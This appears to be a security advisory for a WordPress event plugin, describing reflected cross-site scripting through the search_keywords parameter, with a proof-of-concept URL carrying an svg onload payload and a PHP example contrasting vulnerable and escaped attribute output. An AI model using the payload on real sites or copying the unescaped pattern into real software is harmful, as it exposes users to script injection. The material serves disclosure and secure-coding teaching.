The plugin does not sanitise and escape the search_keywords parameter before outputting it back in an attribute on the event dashboard, leading to Reflected Cross-Site Scripting.
Against any authenticated user: https://example.com/event-dashboard/?search_keywords=aaaa"><svg onload=prompt(/XSS/)>
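The unescaped-attribute pattern described above beside its corrected form, as an added example that is not the plugin's own code. The input markup and the function names render_search_vulnerable and render_search_fixed are hypothetical, and the two stand-in helpers exist only so the file runs outside WordPress, where the real esc_attr() and sanitize_text_field() apply.

```php
<?php
// Added example: hypothetical template code, not taken from the plugin.

// Stand-ins so the file runs outside WordPress. Inside WordPress these
// definitions are skipped and the real core functions are used.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        // Encode &, <, >, " and ' so the value cannot leave the attribute.
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($text) {
        // Simplified stand-in: strip tags and collapse whitespace.
        return trim(preg_replace('/\s+/', ' ', strip_tags((string) $text)));
    }
}

// Before: the request value is concatenated into a double-quoted attribute
// unchanged, so a `">` sequence in the value closes the attribute and the tag.
function render_search_vulnerable(array $query) {
    $kw = isset($query['search_keywords']) ? $query['search_keywords'] : '';
    return '<input type="text" name="search_keywords" value="' . $kw . '">';
}

// After: sanitise the value when it is read, then escape it for the
// attribute context at the point of output.
function render_search_fixed(array $query) {
    $kw = isset($query['search_keywords'])
        ? sanitize_text_field($query['search_keywords'])
        : '';
    return '<input type="text" name="search_keywords" value="' . esc_attr($kw) . '">';
}

// The search_keywords value from the proof of concept above, as the
// application receives it after URL decoding.
$query = array('search_keywords' => 'aaaa"><svg onload=prompt(/XSS/)>');

echo "vulnerable: ", render_search_vulnerable($query), "\n";
echo "fixed:      ", render_search_fixed($query), "\n";
```

In the first line of output the svg element appears as live markup after the closed input tag; in the second the whole value stays inside the quoted value attribute as text.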
Utkarsh Agrawal
Utkarsh Agrawal
Yes
2022-06-20 (about 11 months ago)
2022-06-20 (about 11 months ago)
2023-03-23 (about 2 months ago)